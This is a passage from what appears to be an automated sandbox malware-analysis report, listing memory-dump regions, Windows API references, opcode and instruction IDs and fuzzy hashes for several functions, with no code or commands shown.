                                                                    • Instruction Fuzzy Hash: AB1116B5C006499FCB10CF99D445BDEFBF8EF89314F20885AD568A7250C775A948CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegCloseKey.KERNEL32(00000000), ref: 00355EDF
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: bde992d1469e7f709305f4e83653c1256db2b0ee378f6ef75dc8bb30b08fb869
                                                                    • Instruction ID: 96d9bb959b3614a43352dfaad280f1381f0298320b7ac03f3e9ff6a10690b0c3
                                                                    • Opcode Fuzzy Hash: bde992d1469e7f709305f4e83653c1256db2b0ee378f6ef75dc8bb30b08fb869
                                                                    • Instruction Fuzzy Hash: 761113B1900609CFCB20CF99D445BEEFBF8EB48314F20841AD969A7310D7B5A948CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 0035605C
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ForegroundWindow
                                                                    • String ID:
                                                                    • API String ID: 2020703349-0
                                                                    • Opcode ID: 78e763c8a4fc09a327e39ade780034ab205002bd7969776841644fe7b29914a4
                                                                    • Instruction ID: 9d1c3c2c25512ce65d3a5e87ad5a54557d75514c4ece4dd052c4039da18b63c9
                                                                    • Opcode Fuzzy Hash: 78e763c8a4fc09a327e39ade780034ab205002bd7969776841644fe7b29914a4
                                                                    • Instruction Fuzzy Hash: 2C1100B5C002098FCB20CF99D449BDEFBF4EB48314F20881AC968A3350D779A948CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 076b7ba16b90f13b86cf06f475ad9a63534f4c288a0dcea6a62fbd7cc7d56d7e
                                                                    • Instruction ID: fa0b093ca15e2c34f350287028815adc5f8f5a9b109891b3afdc0e55023dd894
                                                                    • Opcode Fuzzy Hash: 076b7ba16b90f13b86cf06f475ad9a63534f4c288a0dcea6a62fbd7cc7d56d7e
                                                                    • Instruction Fuzzy Hash: 7621F275604344DFCB18EF64E884B56BBA5EB88314F34C9A9E8094B346D33AD807CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42f440d855245d2b78896d208cf6a3440a6927bed8770e797a2ecb5b499c6a9a
                                                                    • Instruction ID: c565430a3e510996f45a019e98a9beeb1171f933dfd3f183ad9595bffcd5bc22
                                                                    • Opcode Fuzzy Hash: 42f440d855245d2b78896d208cf6a3440a6927bed8770e797a2ecb5b499c6a9a
                                                                    • Instruction Fuzzy Hash: 54210775604284DFDB09DF54E5C0B56BBA5FB84314F30C9ADE8094B342D336D806CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ada5df3572db29fc4d3db6d9563c991bc211f09d6a6e5dbb9c0f9efd8602e5e6
                                                                    • Instruction ID: 34cd618b68a7a17f32c8256c336ad19b2ce167afd5ba8080d38778d1dbf76d34
                                                                    • Opcode Fuzzy Hash: ada5df3572db29fc4d3db6d9563c991bc211f09d6a6e5dbb9c0f9efd8602e5e6
                                                                    • Instruction Fuzzy Hash: C72180754083809FCB06DF14D994B15BFB1EB46314F28C5DAD8498F267D33AD816CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e8fee7be0f4f510d8963cdb40196c8bb7ac993b5cbc29ff42f4d3fe7c9977c4
                                                                    • Instruction ID: 75c976224e66e6543c903715ef0526be04343bab485613e0a7f4ba2a98d54de1
                                                                    • Opcode Fuzzy Hash: 6e8fee7be0f4f510d8963cdb40196c8bb7ac993b5cbc29ff42f4d3fe7c9977c4
                                                                    • Instruction Fuzzy Hash: 55119A79904280DFCB16CF14E5C4B55FFA1FB84314F28C6AED8494B656D33AD84ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions